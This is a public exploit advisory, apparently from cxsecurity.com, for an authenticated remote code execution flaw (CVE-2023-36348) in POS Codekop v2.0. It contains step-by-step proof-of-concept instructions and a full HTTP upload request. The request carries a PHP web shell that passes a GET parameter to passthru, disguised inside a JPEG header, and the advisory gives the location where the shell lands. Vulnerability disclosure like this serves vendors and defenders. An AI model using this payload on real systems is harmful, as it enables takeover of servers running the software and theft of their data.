POS Codekop v2.0 Authenticated Remote Code Execution (RCE)

2023.07.03
Credit: yuyudhn
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE) # Date: 25-05-2023 # Exploit Author: yuyudhn # Vendor Homepage: https://www.codekop.com/ # Software Link: https://github.com/fauzan1892/pos-kasir-php # Version: 2.0 # Tested on: Linux # CVE: CVE-2023-36348 # Vulnerability description: The application does not sanitize the filename parameter when sending data to /fungsi/edit/edit.php?gambar=user. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution. # Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/ # Proof of Concept: 1. Login to POS Codekop dashboard. 2. Go to profile settings. 3. Upload PHP script through Upload Profile Photo. Burp Log Example: ``` POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1 Host: localhost Content-Length: 8934 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" **Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-User: ?1** Sec-Fetch-Dest: document Referer: http://localhost/research/pos-kasir-php/index.php?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv Connection: close ------WebKitFormBoundarymVBHqH4m6KgKBnpa Content-Disposition: form-data; name="foto"; filename="asuka-rce.php" Content-Type: image/jpeg ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?> ÿÛC ----------------------------- ``` PHP Web Shell location: http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top